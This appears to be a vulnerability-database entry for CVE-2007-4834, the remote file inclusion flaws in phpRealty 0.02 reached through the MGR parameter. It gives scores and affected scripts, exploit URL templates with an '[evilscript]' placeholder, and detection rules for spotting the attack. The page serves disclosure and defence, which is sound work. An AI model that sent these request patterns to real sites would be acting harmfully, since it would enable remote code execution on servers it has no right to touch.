cbcvebase.
CVE-2007-4834
published 2007-09-12

CVE-2007-4834: Multiple PHP remote file inclusion vulnerabilities in phpRealty 0.02 allow remote attackers to execute arbitrary PHP code via a URL in the MGR parameter to (1)…

PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
58.50%
99.0th percentile
Multiple PHP remote file inclusion vulnerabilities in phpRealty 0.02 allow remote attackers to execute arbitrary PHP code via a URL in the MGR parameter to (1) index.php, (2) p_ins.php, and (3) u_ins.php in manager/admin/.

Affected

1 ranges
VendorProductVersion rangeFixed in
phprealtyphprealty

Detection & IOCsextracted from sources · hover to see the quote

pathmanager/admin/index.php
pathmanager/admin/p_ins.php
pathmanager/admin/u_ins.php
urlhttp://localhost/[ Path ]/manager/admin/index.php?MGR=[evilscript]
urlhttp://localhost/[ Path ]/manager/admin/p_ins.php?MGR=[evilscript]
urlhttp://localhost/[ Path ]/manager/admin/u_ins.php?MGR=[evilscript]
  • Detect HTTP requests targeting the MGR parameter in phpRealty admin scripts (index.php, p_ins.php, u_ins.php) under manager/admin/ with a URL value, indicative of remote file inclusion exploitation.
  • Monitor GET/POST requests to manager/admin/index.php, manager/admin/p_ins.php, or manager/admin/u_ins.php where the MGR parameter contains an external URL (http:// or https://) pointing to a remote script.
  • ·Vulnerability only affects phpRealty version 0.02; verify the installed version before applying detection rules to avoid false positives on other versions.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.